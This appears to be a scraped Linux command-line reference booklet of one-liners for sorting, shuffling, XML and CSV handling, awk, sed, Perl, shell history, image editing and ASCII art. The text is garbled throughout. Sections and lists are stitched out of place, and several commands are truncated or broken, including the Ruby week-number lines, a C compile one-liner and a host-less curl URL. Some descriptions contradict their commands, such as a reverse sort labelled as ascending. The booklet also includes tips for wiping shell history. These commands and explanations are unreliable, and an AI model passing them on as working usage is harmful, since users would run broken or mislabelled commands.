The unix 'sort' utility is a powerful and flexible way to reorder lines of a text file based on the data in one or more of the 'fields' of each line. A field is a chunk of text separated from another chunk by a 'delimiter' character such as a space or a colon. For example if the line is 'italy 3 4/oct/1999' and the delimiter is a space then the fields are 'italy', '3' and '4/oct/1999'

By default, sort divides a line into fields based on spaces or tabs but can use another character (see the -t option)

Viewing Help For Sort ‹↑›

view some examples of using the 'sort' program

 info coreutils 'sort invocation'

view a confusing description about how 'sort' works

 man sort   this is a classic example of an accurate but baffling man page

Basic Usage ‹↑›

sort in alphabetical order (abc...) the lines of the text file 'data.txt'

 sort data.txt    the sorted lines are displayed, the file is unchanged

sort in reverse alphabetical order (zxy...) the lines of the file 'data.txt'

 sort -r data.txt

sort in alphabetical order, ignoring case, the lines of the file 'data.txt'

 sort -fr data.txt
 sort -f -r data.txt   the same

sort in alphabetical order using the 3rd 'field' in each line as the sort key

 sort -k3 data.txt  each 'field' is a bit of text separated by spaces
 sort +2 data.txt   prehistoric syntax, probably to be avoided like bubonic

Sort IPV4 ip addresses

 sort -t. -k1,1n -k2,2n -k3,3n -k4,4n

sort lines by length

 perl -lne '$l{$_}=length;END{for(sort{$l{$a}<=>$l{$b}}keys %l){print}}' < /usr/share/dict/words | tail

Sort Inplace ‹↑›

sort a file and update it

 sort -o data.txt data.txt       is this safe??
 sort --output=data.txt data.txt

Sorting By Multiple Fields ‹↑›

The lines of a file can be sorted first by one field, and then by a second field when the value of the 1st field is equal

sort a file alphabetically by the 1st field and then numerically by the 2nd

 sort -k1 -nk2 data.txt

sort the lines alphabetically using the first 3 fields of the file

 sort -k 1,3 data

Numerical Sorts ‹↑›

perform a numerical sort using the second field

 sort -k2,2n data.txt  2,2 means from the 2nd to the 2nd field
 sort -n -k2 data.txt  watch out! this may be different ??

sort lines using the 2nd field as a numeric key with fields delimited by '/'

 sort -n -t/ -k2 data.txt
 sort -n -t'/' -k2 data.txt    the same
 sort -nt/ -k2 data.txt      the same, again

sort in ascending numerical order using the 2nd field as the sorting key

 sort -k 2,2n data   possibly the correct way to do this
 sort -k 2n,2n data  the same
 sort -n -k2 data    this may be subtly different
 sort -nk2 data      options can be written together

sort the lines of 'data' using the 3rd ':' delimited field as a number key

 sort -n -k3 -t: data
 sort -nk3 -t: data       the same
 sort -nk3 -t :  data     the same again

sort the lines of 'data' in descending (reverse) numeric order

 sort -rn data

sort lines in descending numerical order using the 2nd field as the sort key

 sort -k2 -r -n data.txt
 sort -rnk2 data.txt    the same, but better

sort in ascending numeric order using only the 1st digit of the 2nd field

 sort -nk2.1,2.1 data.txt '2.1,2.1' means 'from the 1st to the 1st char

sort in descending numeric order using the first 3 digits of the 2nd field

 sort -rnk2.1,2.3 data.txt

Sorting By Date Values ‹↑›

The problem of sorting by a date value is somewhat tricky, mainly because of the daunting array of different formats which a date can appear in, without even thinking about intercultural differences. However 'sort' is capable of sorting by date value, where the dates are in a consitent format.

Where the date string is of a variable length the problem gets harder. It may be possible to use the -t delimiter to divide up each field of the date (eg use '-t/' for '1/january/08' and '02/oct/2001')

Use the 'M' modifier to recognise month names and abbreviated month names

sort lines by month name, assuming that field 3 is an english month name

 sort -k3M data  field 3 can be something like 'feb', 'oct' or 'january'

sort by month names using the 3rd character of the 2nd field as the start point

 sort -k2.3M data  field 2 may be '--jan' or '::august' etc

sort lines by the 1st field, a date in the format dd/mm/yyyy (eg '09/11/1922')

 sort -k 1.7n -k 1.4n -k 1.1n -k 4.14,4.21 data.txt
note that '4/11/1920' will not sort well but '04/11/1920' will

reverse sort lines by a date field in the format dd/mm/yyyy

 sort -k 1.7nr -k 1.4nr -k 1.1nr data.txt

sort lines with the second field a date in format dd/MON/yyyy '02/Apr/2010'

 sort -k 1.8n -k 1.4M -k 1.1n data.txt
the month abbreviations must be 3 letters, and in english ...

sort lines by a date/time value such as '01/Jan/2004:06:31:51'

 sort -k 1.8n -k 1.4M -k 1.1n -k 1.13,1.21 data.txt
this assumes the date is the first field of each line

Fields And Partial Fields ‹↑›

sort lines starting the key at the second character of the 2nd field

 sort -k2.2 data

sort using characters 2 to 8 as the alphabetic sort key

 sort -k2.2,2.8 data

Other Tools ‹↑›

tsort is a mysterious tool


sort text files by the number of lines which they contain, reverse order

 file * | grep text | sed "s/:.*//" | xargs wc -l | sort -rn | grep -v "total$" | less

display the lines in a text file 'shuffled'

 shuf file.txt

shuffle lines in a file and update the file

 shuf -o F <F'       according to the man pages, this is safe
 cat F | shuf -o F   the same, no risk of truncation 'apparently'

shuffle some lines entered at the prompt

      shuf <<eof
        A man,
        a plan,
        a canal:

shuffle command line arguments

   shuf -e clubs hearts diamonds

display the lines of a file in reverse order

 tac file     yes 'tac' is the reverse of 'cat'

Typesetting Text Documents ‹↑›

This section explains how to prepare documents to be printed on paper. This is actually a really large topic. See also the latex-book.txt file for detailed information about the Latex typesetting system.

related booklets

Overview ‹↑›

This section tries to give an overview of the numerous tools available to produce 'typeset' documents in a format ready to be sent to a printer (such as pdf or postscript).

www: markdown
The user writes a plain text document adhering to certain formatting rules ... and markdown produces a formatted html document
www: halibut
The user embeds simple 'markup' codes into the text document and the tool can convert the document into a variety of output formats including pdf
www: reStructured
text another philosophy similar to markdown
a page about 'restructured text'

Latex ‹↑›

Latex is for people who have 4 years to write a thesis. If you have less time, use enscript or halibut.

see the latex booklet at

convert a latex source file (.tex) into opendocument (.odt )

 htlatex MyFile.tex "xhtml,ooffice" "ooffice/! -cmozhtf" "-coo -cvalidate"

Text Data Formats ‹↑›

store personal contact information in a text file


Xml ‹↑›

www: http://xmlstar.source¿
The home page for xmlstarlet
more linux xml software
xmlstarlet examples
typesetting tool quick summary
groff an old unix system, used for 'man' pages
latex extensive system widely used for scientific and maths docs
docbook an xml based "super" system
pod the perl document system,
man the old unix "manual page" system based on groff
enscript turns text into pdf in a configurable manner
markdown minimal text markup
pandoc implements and extends markdown, lots of output format
phpmarkdown a php implementation of markdown

remove comments from xml

 cat <filename> | perl -e '$/ = ""; $_ = <>; s/<!--.*?-->//gs; print;'

remove comments from the xml file 'page.xhtml'

 xmlstarlet ed -d '//comment()' page.xhtml

show some help information for the 'ed' option of xmlstarlet

 xmlstarlet ed -h

display the xml entity for the & ampersand character

 xmlstarlet esc '&'

Count elements matching XPath expression

 xmlstarlet sel -t -v "count(/xml/table/rec/numField)" xml/table.xml

Count all nodes in XML document

 xmlstarlet sel -t -f -o " " -v "count(//node())" xml/table.xml xml/tab-obj.xml

Delete elements matching XPath expression

 xml ed -d /xml/table/rec[@id='2'] xml/table.xml

Generate HTML from given SGML docbook document

 xml tr --omit-decl --docbook /usr/share/sgml/docbook/yelp/docbook/html/docbook.xsl  sgml/docbook1.sgml | xml fo --html --indent-spaces 2

Validate XML document against a DTD

 xml val --dtd dtd/table.dtd xml/tab-obj.xml >/dev/null 2>&1; echo $?

Prettify an XML file

 tidy -xml -i -m [file]

Csv ‹↑›

csv stands for 'comma separated something' and is an old and simple text data format. A simple example of a line in a csv file would be

 "Bob", "Green", 43

Where each of the fields may stand for 'first name', 'second name' and age.

sum all the numbers in the 4th column from a csv data file

 awk -F ',' '{ x = x + $4 } END { print x }' test.csv

turn lines in columns in csv format

 ls | sed -n '1h;2,$H;${g;s/\n/,/g;p}'

convert 'csv' text data files to 'tsv' (tab delimited format)

 sed 's/,/\t/g' report.csv > report.tsv

sum columns from csv column $col

 perl -ne 'split /,/ ; $a+= $_[3]; END {print $a."\n";}' -f ./file.csv

pretty-print a simple csv file on the command line

 column -s, -t <tmp.csv

parse a quoted .csv file

 awk -F'^"|", "|"$' '{ print $2,$3,$4 }' file.csv

extract the 2nd field of a csv file with 'cut'

 cut -d\" -f2 file.csv
 cut '-d"' -f2 file.csv

Text Oriented Programming Languages ‹↑›

The Awk Language ‹↑›

a tutorial
one line examples of awk
Randomize lines in a file
 awk 'BEGIN{srand()}{print rand(),$0}' SOMEFILE | sort -n | cut -d ' ' -f2-

Print a row of 50 hyphens

 awk 'BEGIN{while (a++<50) s=s "-"; print s}'

Calculating series with awk: add numbers from 1 to 100

 seq 100 | awk '{sum+=$1} END {print sum}'

print file without duplicated lines using awk

 awk '!($0 in a) {a[$0];print}' file

Print line immediately before a matching regex.

 awk '/regex/{print x};{x=$0}'

Grep ‹↑›

Grep is the classic and venerable unix tool for searching for text within files.

count how many times a string appears in a tree of files

 grep -or string path/ | wc -l

permanently let 'grep' colorize its output

 echo alias grep=\'grep --color=auto\' >> ~/.bashrc ; . ~/.bashrc

Search through files, ignoring .svn

 grep <pattern> -R . --exclude-dir='.svn'

Output files without comments or empty lines

 grep -v "^\($\|#\)" <filenames>

Colorize matching string without skipping others

 egrep --color=auto 'usb|' /var/log/messages

find string

 grep -iR find_me ./

Sed Stream Editor ‹↑›

This section provides only a very brief overview to the sed stream editor attempting to cover only the most common tasks which may be performed with sed. For more information see the booklet 'sed-book.txt'

The official site for sed containing many examples
perform sed substitution on all but the last line of input
 sed -e "$ ! s/$/,/"

replace 'a' with 'A', 'b' with 'B' etc, similar to the 'tr' tool

 sed "y/abcd/ABCD/g"

convert words beginning in 'b' or 'c' to upper case

 sed -r "s/\<(b|c)[a-z]+/\U&/g"

convert upper case words to lower case

 sed -r "s/\<[[:upper:]]+\>/\L&/g"

match words beginning in 'a' or 'b'

 sed -r "s/\<(a|b)[a-z]+/&/g"

make changes to files and back up to .bak

 sed -i.bak -r "s/yes/no/g" *.txt    gnused 4

detailed information about gnu regular expressions (used in sed)

 man 7 regex

delete uppercase letters and commas.

 sed -r 's/[[:upper:],]//g'

Perl ‹↑›

Perl is a language which was originally inspired by the Bash shell syntax, as well as by the idea of writing terse but powerful programs. Perl initially rose to fame through its suitability for writing web-server cgi scripts, since perl, like the unix shells, uses plain text as a kind of "data interchange format".

This section only provides the briefest of introduction to perl, with an emphasis on using short, one-line programs for carrying out a simple task from the bash-shell.

a command line calculator in perl

 perl -e 'for(@ARGV){s/x/*/g;s/v/sqrt /g;s/\^/**/g};print eval(join("",@ARGV)),$/;'

determine if a regular expression has a valid syntax

 perl -we 'my $regex = eval {qr/.*/}; die "$@" if $@;'

a command which will make perl crash

 perl -e '$x = []; push @$x, eval { $x = 1; return $x = 1; }'

transform the contents of a text file to all uppercase.

 perl -i -ne 'print uc $_' $1

print the line numbers of a text file

 perl -ne 'print "$. - $_"' infile.txt

Sort the size usage of a directory tree by gigabytes, kilobytes,

 du -b --max-depth 1 | sort -nr | perl -pe 's{([0-9]+)}{sprintf "%.1f%s", $1>=2**30? ($1/2**30, "G"): $1>=2**20? ($1/2**20, "M"): $1>=2**10? ($1/2**10, "K"): ($1, "")}e'

Perl Documentation ‹↑›

debian: perl-doc - to use the perldoc tool

query the perl "frequently asked questions" documents for a word or phrase

 perldoc -q eval

show the documentation for the CGI module

 perldoc CGI   these names are case-sensitive, "perldoc cgi" doesnt work

Perl One Line Scripts ‹↑›

include 2 perl expressions with the -e expression

 perl -e 'print "Hello";' -e 'print " World\n"'

print the 1st and 2nd fields of the input lines

 echo a b c | perl -lane 'print "@F[0..1]"'

print the 3rd line of a file

xml tools
xmlstarlet - useful tools for xml from the command line

display the current week number

 perl -e 'use Date::Calc qw(Today Week_Number); $weekn = Week_Number(Today); print "$weekn\n"'

Perl Modules ‹↑›

Upgrade all perl modules via CPAN

 perl -MCPAN -e 'CPAN::Shell->install(CPAN::Shell->r)'

Upgrade all perl modules via CPAN

 cpan -r

Open Perl module source in your editor

 $EDITOR `perldoc -l Module::Name`

clean up syntax and de-obfuscate perl script

 %! perl -MO=Deparse | perltidy

Python ‹↑›

one-liner to display ip addresses

 python -c "import socket; print '\n'.join(socket.gethostbyname_ex(socket.gethostname())[2])"

An easter egg built into python to give you the Zen of Python

 python -c 'import this'

Cleanup Python bytecode files

 find . -name "*.py[co]" -exec rm -f {} \;

Quick syntax highlighting with multiple output formats

 $ python -m pygments -o source.html

Ruby ‹↑›

Ruby is a language which, along with Python has become increasingly popular. The 'Ruby on Rails' system is a frame-work for creating web-applications (complex websites)

Display command lines visible on homepage

 ruby -ropen-uri -e 'require "hpricot";(Hpricot(open(""))/".command").each{| c| puts c.to_plain_text}'

print a row of 50 hyphens

 ruby -e 'puts "-" * 50'

ruby one-liner to get the current week number

 ruby -rdate -e 'p'

ruby one-liner to get the current week number

 ruby -e 'require "date"; puts'

Php ‹↑›

run php code inline from the command line

 php -r 'echo strtotime("2009/02/13 15:31:30")."\n";'

display information about the php configuration

 php -i

test the php configuration

 php -r "phpinfo\(\);"

search a folder to check for syntax errors in php files

 find . -name "*.php" -exec php -l {} \;

The C Language ‹↑›

enter and compile a c one line program

 /lib/ =(echo -e '#include <stdio.h>\nint main(){printf("c one liners\\n");}' | gcc -x c -o /dev/stdout -)  ?? unchecked code

Source Code Files ‹↑›

Viewing Source Code ‹↑›

view '' in a pager with some syntax highlighting

 over     over is part of the 'enscript' package

Formatting And Indenting Source Code ‹↑›

The program 'indent' is designed for c and cpp but can be used for java as well.

format source code

 astyle, indent, bcpp

indent a c file with no brace indent,

 indent -bli0 <file.c The '{' will be directly under the clause

indent 'file.c' but dont put blank lines after procedures

 indent -nbap <file.c

indent using the 'kernighan & ritchie' style (compact)

 indent -kr -st | less

indent 'file.c' without lining up parenthesis (). (prevents large indents)

 cat file.c | indent -kr -nlp -st | less
the 'k & r' style puts the braces on the same line

indent with an indent of 2 spaces, writing to standard output

 indent -gnu --indent-level2  -st | less
the gnu style puts the curly braces underneath the previous line

bli is the brace indent

indent the java code file 'original', with an indent of 2 spaces

 astyle -js2 < original > new
 astyle --mode=java --indent=2 < original > new  the same

Converting To Syntax Highlighted Documents ‹↑›

The following tools can convert source code in a text file to another format, such as HTML, rtf or LaTeX, with the syntax of the source code highlighted for easier reading. For HTML, the tool 'webcpp' seems to produce the nicest looking output (at least with the default settings). All the tools support a number of programming languages for the input code file.

Syntax highlighting tools

www: webcpp outputs only in HTML
www: highlight
outputs formats: ansi latex xterm256 rtf tex xhtml xml svg
www: gnu
source-highlight output formats: HTML, XHTML, LaTeX, Texinfo, ANSI color escape codes and DocBook
www: the
vim editor
www: enscript
convert source code to highlighted html with no <html> <body> tags
 webcpp codefile htmlfile -s

convert 'file' to html, writing to standard out with unix script type

 cat file | webcpp - - -x=sh -s | less

convert java code to html with line numbers and internal css definition

 highlight -i -o -I -l

convert a c file to LaTeX with the syntax highlighted

 highlight -L -i main.cpp -o main.cpp.tex

'highlight' output formats

 LaTeX (-L), XHTML (-X), TeX (-T), RTF (-R), ANSI Escape Quotes(-A), and XML (-Z).

convert a c++ file to html from an input stream and with external css

 highlight < main.cpp > main.cpp.html -Sc

convert chom.c to pretty printed postscript with 2 columns, landscape

 enscript -p -Ec -2 -r -f "Courier8" chom.c
 enscript -p -2rEc -f Courier8 chom.c     the same

 perl -nle 'print if $. == 1' file.txt

convert '' to a syntax highlighted 6 point pdf file

 enscript -o - -2rE -f Courier6 | ps2pdf - Assig.pdf

the enscript options used
-p - output to the file ''
-r - landscape
-2 - two columns
-Ec - syntax highlight with 'c' syntax
-f "Courier8" - use a 8 point courier font

see what computer languages enscript can handle

 enscript --help-pretty-print

Command History ‹↑›

The 'history' file is a special text file which contains all recent commands which have been entered at the command line. This is invaluable to avoid retyping things.

Contains more information about the bash history file
put a time stamp in the command history and store more commands
 export HISTTIMEFORMAT='%Y.%m.%d-%T :: ' HISTFILESIZE=50000 HISTSIZE=50000

This will result in the 'history' command displaying something like ----- 514 2010.05.12-09:15:26 :: ls -thor 515 2010.05.12-09:15:50 :: java AssigOne110 516 2010.05.12-09:16:36 :: ls ,,,

A function to display the history and optionally search through it

 h(){ if [ -z "$1" ]; then history; else history | grep "$@"; fi; }; h
 h(){ [ -z "$1" ] && history || history | grep "$@"; }; h

clear your history saved into .bash_history file

 history -c && rm -f ~/.bash_history

clear your history saved into .bash_history file

 history -c

put environment variable in history to edit

 print -s "PATH='$PATH'"

A bit of privacy in .bash_history

 export HISTCONTROL=ignoreboth

List of commands you use most often

 history | awk '{a[$2]++}END{for(i in a){print a[i] " " i}}' | sort -rn | head

find the longest command in your history

 history | perl -lane '$lsize{$_} = scalar(@F); if($longest<$lsize{$_}) { $longest = $lsize{$_}; print "$_"; };' | tail -n1

exit without saving history

 kill -9 $$

See most used commands

 history|awk '{print $2}'|awk 'BEGIN {FS="|"} {print $1}'|sort|uniq -c|sort -r

Avoiding history file to be overwritten

 shopt -s histappend

Add timestamp to history


delete a line from your shell history

 history -d

Text And Character Recognition ‹↑›

See for more information about this topic

The process of extracting text data from an image file (which has usually been obtained by scanning a page of typed text) is known as "ocr" for Optical Character Recognition

the enscript options used
-r - landscape
-2 - two columns
-E - syntax highlight the code
-f "Courier6" - use a 6 point courier font
-o - sent the output to standard out

Images ‹↑›

A more comprehensive treatment of images on linux
Determine an image's dimensions
 identify -format "%wx%h" /path/to/image.jpg

Convert images (jpg, png, ...) into a big PDF 'big.pdf'

 convert images*.* big.pdf

Recipes ‹↑›

browse the '.gif' images in the '/usr/doc/imagemagick/examples' directory

 display 'vid:/usr/doc/imagemagick/examples/*.gif'

browse through all image files in the current directory

 display 'vid:*'

In the preceding example, only those files with image formats supported by display are read and displayed.

put the image 'tetra.jpeg' in the root window

 display -window root tetra.jpeg

Use zgv to view images in a virtual console (not in X). You can use zgv

browse the images in the current directory

browse the images in the '/usr/share/gimp/scripts' directory, type:
 zgv /usr/share/gimp/scripts
Use the arrow keys to navigate through the file display; the red border

view the file '/usr/share/images/mondrian-15.jpeg' file:/usr/share/images/mondrian-15.jpeg Notice that the given [36]file: URL only has one preceding slash, pointing to the root directory, and not two, as in [37]http://.

browse the images on the PhotoCD disc mounted on '/cdrom'

 xpcd /cdrom
The preceding example will open two new windows -- a small xpcd command bar window, and a larger window containing thumbnails of all PhotoCD

view the PhotoCD file 'driveby-001.pcd'

 xpcd driveby-001.pcd
NOTE: You can also use display to view a '.pcd' PhotoCD image file (see

resize 'phoenix.jpeg' to 480x320 pixels

 mogrify -geometry 480x320 phoenix.jpeg
This transforms the original 'phoenix.jpeg' file to: editing-images-scaling-01

resize 'phoenix.jpeg' to exactly 480x320 pixels, regardless of aspect ratio

 mogrify -geometry 640x480! phoenix.jpeg
This transforms the original 'phoenix.jpeg' to:

increase the height of 'phoenix.jpeg' by 25 percent and decrease its width by 50 percent

 mogrify -geometry 125%x50% phoenix.jpeg

rotate 'phoenix.jpeg', whose height exceeds its width, by 90 degrees

 mogrify -rotate '90<' phoenix.jpeg

reduce the colors in 'phoenix.jpeg' to two

 mogrify -colors 2 phoenix.jpeg
This transforms the original 'phoenix.jpeg' to: editing-images-colors-01

reduce the colors in 'phoenix.jpeg' to four and apply Floyd-Steinberg error diffusion

 mogrify -colors 4 -dither phoenix.jpeg
This transforms the original 'phoenix.jpeg' to:

change the colors in the file 'rainbow.jpeg' to those used in the file 'prism.jpeg'

 mogrify -map prism.jpeg rainbow.jpeg
Use the '-monochrome' option to make a color image black and white. make the color image 'rainbow.jpeg' black and white
 mogrify -monochrome rainbow.jpeg
If you have a PPM file, use ppmquant to quantize, or reduce to a specified quantity the colors in the image -- see the ppmquant man page

set the gamma correction of the image 'rainbow.jpeg' to .8, type:

 mogrify -gamma .8 rainbow.jpeg

annotate the image file 'phoenix.jpeg', type (all on one line):

 mogrify -comment "If you can read this,
you're too close!" phoenix.jpeg You won't see the annotation when you view the image; it is added to

read any comments made in the image file 'phoenix.jpeg'

 rdjpgcom phoenix.jpeg

add a border two pixels wide and four pixels high to 'phoenix.jpeg'

 mogrify -border 2x4 phoenix.jpeg

add a decorative frame eight pixels wide and eight pixels high to 'phoenix.jpeg'

 mogrify -frame 8x8 phoenix.jpeg
This transforms the original 'phoenix.jpeg' to:

create a montage from the files 'owl.jpeg', `thrush.jpeg', and 'warbler.jpeg' and write it to `endangered-birds.png'

 montage owl.jpeg thrush.jpeg warbler.jpeg endangered-birds.png
NOTE: In this example, three JPEGs were read and output to a PNG file;

combine two images, 'ashes.jpeg' and `phoenix.jpeg', into a new file 'picture.jpeg'

 combine ashes.jpeg phoenix.jpeg picture.jpeg
You can specify the percentage to blend two images together with the

combine the image files 'phoenix.jpeg' and `ashes.jpeg' so that the blended image contains 70 percent of the second image

 combine -blend 70 ashes.jpeg phoenix.jpeg picture.jpeg
This command combines the two images and writes a new image file,

make a morphed image of the files 'ashes.jpeg' and 'phoenix.jpeg', and write it to `picture.jpeg'

 combine -compose difference ashes.jpeg phoenix.jpeg picture.jpeg
The result in file 'picture.jpeg' is:

convert the JPEG file 'phoenix.jpeg' to a PNG image

 convert phoenix.jpeg phoenix.png
This command converts the JPEG image 'phoenix.jpeg' to PNG format and writes it to a new file, 'phoenix.png'.

convert the PNM file 'pike.pnm' to non-interlaced JPEG while sharpening the image by 50 percent and adding both a 2x2 border and a copyright comment

 convert -interlace NONE -sharpen 50 -border 2x2

list available scanner devices

 scanimage --list-devices

device 'umax:/dev/sgb' is a UMAX Astra 1220S flatbed scanner

list available options supported by the device listed in the previous example

 scanimage --help -d 'umax:/dev/sgb'

NOTE: For all scanimage commands, specify the scanner device you want

test the UMAX scanner listed previously

 scanimage --test -d 'umax:/dev/sgb'

Debian: 'netpbm'

make a 72 dpi scan of a color image 200 pixels wide and 100 pixels tall, using the UNIX scanner from previous examples, and writing to a file called 'scan.ppm'

 scanimage -d umax:/dev/sgb --resolution 72 -x 200 -y 100 >

make a 300 dpi scan of a black and white image 180 pixels wide and 225 pixels tall, using the UMAX scanner from previous examples, and writing to a file called 'scan.pbm'

 scanimage -d umax:/dev/sgb --resolution 300 --mode lineart

extract the highest resolution from the file 'slack.pcd' and save it to a PPM file named 'slack.ppm'

 pcdtoppm -r5 slack.pcd slack.ppm
[37]Converting PhotoCD: Converting PhotoCD images to other formats.

convert the file 'slack.ppm' to non-interlaced JPEG, sharpen the image, add a two-pixel by two-pixel border, and annotate the image, type (all on one line):

 convert -interlace NONE -sharpen 50 -border 2x2 -comment

remove the "green haze" from a PhotoCD image, do the following: + First, open the extracted image in the GIMP (see [44]Editing Images with the GIMP). + Then, click through the Image menu to the Colors submenu and

Managing Images ‹↑›

find all image files in the 'icons' folder

 find /usr/share/icons/ | xargs file | grep image | less

find all image files on the computer

 sudo find / | xargs file | grep ' image' | less

Viewing Images ‹↑›

ocr tools
tesseract-ocr - Command line OCR tool said to be mature
ocropus - google sponsored ocr tool uses tesseract
gocr -
ocrad -
clara -
unpaper - improve the quality of scanned text images

show jpegs with thumbnails

 find ~ -name '*.jpg' | xargs mirage

Feh ‹↑›

Feh is a fast command line driven image viewer. maybe just what we need.

show all the images in the /opt/images tree in a slideshow.

 feh -r /opt/images

same again, but sort by image name before showing.

 feh -rSname /opt/image

create a montage from the images in /opt/images/landscapes

 feh -m /opt/images/landscapes

Create a montage from the images in /opt/images/landscapes and all directories below it. Limit the width of the image to 400 and make the thumbnails 30x20, ignoring aspect ratio

 feh -Xrm -W 400 --thumb-width 30 --thumb-height 20 ./landscapes

view jpgs and gifs with thumbnails

 find ~ -name '*.jpg' -o -name '*.gif' | xargs gthumb

open all images specified in the text file 'images.txt' (one per line)

 qiv -F images.txt
 qiv --file images.txt

display all jpg and gif images shrinking to fit them in the window

 find ~ -name '*.jpg' -o -name '*.gif' | xargs qiv -t

browse through all "gif" images in the current folder "gallery" style

 display 'vid:*.gif'

Image Metadata ‹↑›

Remove EXIF data from images with progress

 i=0; f=$(find . -type f -iregex ".*jpg");c=$(echo $f|sed "s/ /\n/g"| wc -l);for x in $f;do i=$(($i + 1));echo "$x $i of $c"; mogrify -strip $x;done

Screenshots ‹↑›

linux image viewers
xv - an old x windows viewer
xli - another one
aview - ascii image viewer
asciiview -
feh - a fast command line driven image viewer
gthumb - a gnome viewer and simple editor
geeqie - gtk image viewer
gpicview - small image viewer
gqview - simple gtk image viewer emacs style keys
eye of gnome - the gnome viewer
mirage - simple gtk viewer with thumbnails
imgseek - image viewer manager, requires python
pqiv - similar to qiv but different, very basic
qiv - quick image viewer up to date
gwenview - kde image viewer
showfoto - kde

The process of creating an image from what is currently displayed on the computer screen is generally known as "screen capture" or a "screenshot"

take a screenshot of the desktop window after 5 seconds, and display it

 import -pause 5 -window root desk.png; display desk.png
 scrot -d 5 desk.png; display desk.png    the same

Using a pause like this before taking the screenshot, allows you to rearrange the windows on the desktop if you so desire.

take a screen shot of the whole screen and save it to 'test.png'

 scrot test.png

take a low-quality screen shot in 'test.png' and display it

 scrot -q 10 test.png; feh test.png

on macosx capture the whole screen as a jpg image and display it

 screencapture -tjpg test.jpg; open test.jpg

make an image of the currently focussed window and save as 'test.jpg'

 scrot -u test.jpg

capture a window, with its window frame, save in the file 'i.png'

 import -frame i.png

After typing this, left-click on the window you want to capture. In other words the technique above, is an 'interactive' technique for capturing an image of a screen

Meta Data ‹↑›

command to change the exif date time of a image

 exiftool -DateTimeOriginal='2009:01:01 02:03:04' file.jpg

set timestamp in exif of a image

 exiv2 -M"set Exif.Photo.DateTimeOriginal `date "+%Y:%m:%d %H:%M:%S"`" filename.jpg

Image Information ‹↑›

show the width x height of the image "bird.png"

 identify -format "%wx%h" bird.png  prints "16x20" for example

rename all "png" files, so that the name includes the width and height

 for f in *.png; do rename "s/\./-"$(identify -format "%wx%h" $f)"./" $f; done

Optimizing Images ‹↑›

optimize png images

 debian: optipng

tools for screen capture
import - makes screen shots part of 'imagemagick' package.
scrot - a simple command line screen capture utility
screencapture - the macosx (jaguar) utility

Transforming Images ‹↑›

reduce in size all jpeg images in the folder by 50%

 mogrify -resize 50% *.jpg    the images are changed

reduce by 50% an image and save the reduced image as "rose2.jpg"

 convert rose.jpg -resize 50% rose2.jpg

rotate an image by 90 degrees where the height exceeds the width

 mogrify -rotate '90<' image.jpeg

rotate an image where the width exceeds the height

 mogrify -rotate '90>' image.jpeg

convert an image to black and white

 mogrify -monochrome colourful.jpeg

add a grey border 2px wide and 4px high around an image

 mogrify -border 2x4 cat.jpg
 mogrify -frame 8x8 cat.jpg    a bevelled border

Converting Image Formats ‹↑›

convert the jpeg image "rose.jpg" to the "png" format.

 convert rose.jpg rose.png

convert all png images in the current folder to the jpeg format

 mogrify -format jpg *.png    a copy of the images is created

convert a large number of "gif" images to the "png" format

 find . -name "*.ico" | xargs mogrify -format png
this is very fast

Batch resize all images in the current directory

 mogrify -resize 800\> *

Animation ‹↑›

# frame numbers start at 0

show information for all the frames in an animation

 identify tree.ico

display how many frames an animation has

 identify tree.gif | wc -l

extract the 2nd frame from an animated gif and save to "new.gif"

 convert animation.gif[frame1] new.gif

Resizing Images ‹↑›

Resize photos without changing exif

 mogrify -format jpg -quality 80 -resize 800 *.jpg

resize(1/2) the image using imagemagick

 convert -resize 50%x50% image{,_resize}.jpg

crop a 32x32 pixel block starting at pixel (16,16) and save to "new.gif"

 convert tree.gif -crop 32x32+16+16 new.gif

crop a 20 pixel vertical strip starting at the top left hand corner

 convert tree.png -crop 20x0+0+0 new.png

create a 1 row montage with a gap in the middle

 montage medical.gif null: present.gif -tile x1 -geometry +2+2 new.jpg

create a montage with the file name under the image, silver background

 montage -label '%f' x.png -font Arial -pointsize 30 -geometry +0+0 -background silver xy.png

rename images according to exif or jpeg metadata

 exiv2 rename *.jpg

draw a label at the bottom of the image in a grey rectangle (superimposed)

 convert tree.png -fill '#0008' -draw 'rectangle 5,128,114,145' \
   -fill white -annotate +10+141 'Tree' new.png

Images Of Text ‹↑›

create an image, size 165x70, of text "Tree" with text centered in image

 convert -fill blue -font Helvetica -size 165x70  -pointsize 24 \
 -gravity center label:Tree tree.gif

create an image of text, with text font size auto-fitted to image size

 convert -fill blue -font Candice -size 165x70 label:Tree new.gif; feh new.gif

create an image label from text from standard input

 echo "hello!" | convert -fill blue label:@- new.gif; feh new.gif

Compressing Images ‹↑›

reduce the quality (& file size) of an image, and save in "tree-80.jpg"

 convert tree.jpg -quality 80% tree-80.jpg

reduce a jpeg even more

  -sampling-factor 2x1

Visual Art ‹↑›

The open clip art library.

a tag cloud of open clip art
image format notes
png is a lossless format, has transparency
jpg highly compressable, lossy, no transparency
gif animations possible, compressed,

Ascii Art ‹↑›

a demonstration of the aview tool


create-resources - brushes gradients etc

Outputs files with ascii art in the intended form.

 iconv -f437 -tutf8 asciiart.nfo

display a text banner with a 50 character width

 banner -w50 'hello'

draw a box with an ascii-art dog design around the text 'hello'

 echo hello | boxes -d dog

choose from a set of ascii art pictures with speech bubbles

 cowsay -f tux 'hello'

A death cow thinking in your fortune cookie

 fortune -s -c -a | cowthink -d -W 45

view a video using only 'ascii art'

 mplayer -vo aa <video file>

bulk dl files based on a pattern

 curl -O /met-art-free-sample-00[00-19].jpg

create ascii art pictures with various colours


pass a backslash character as an argument to figlet

 figlet $'\\'

write 'chapter 1' as ascii bubble text

 figlet "Chapter 1"

pass a form feed character followed by a pilcrow sign character (octal character code 266) to figlet

 echo $'\f\266'

plot the curve 'sin(x)' as ascii text

 echo "set terminal dumb; plot sin(x)" | gnuplot -persist

an ascii art font for your readme text

 toilet -f big ReadMe

vertically scrolling ascii banner text

 while [ 1 ]; do banner 'scroll! ' | while IFS="\n" read l; do echo "$l"; sleep 0.02; done; done

Patterns And Tilings ‹↑›


Charts And Graphs ‹↑›

the 'pic' and 'grap' groff preprocessors debian: rlplot, ygraph, dia

ascii art tools
aview -
cadubi - an ascii art editor
aewan - an ascii art editor
textdraw - create ascii geometric figures
figlet - create ascii text banners
cowsay - create ascii pictures of cows with speach bubble
banner - show a large ascii banner text

www: graphviz
a package with tools, including 'dot' for drawing network type graphs
Create package dependency graph
 apt-cache dotty PKG-NAME | dot -Tpng | display

Gnuplot ‹↑›

A booklet about the gnuplot tool, in the same format as the current booklet.
This section is only meant as a brief demonstration of what gnuplot is capable of. For more detailed information please consult the booklet mentioned above.

create an image of a sin curve graph and display it

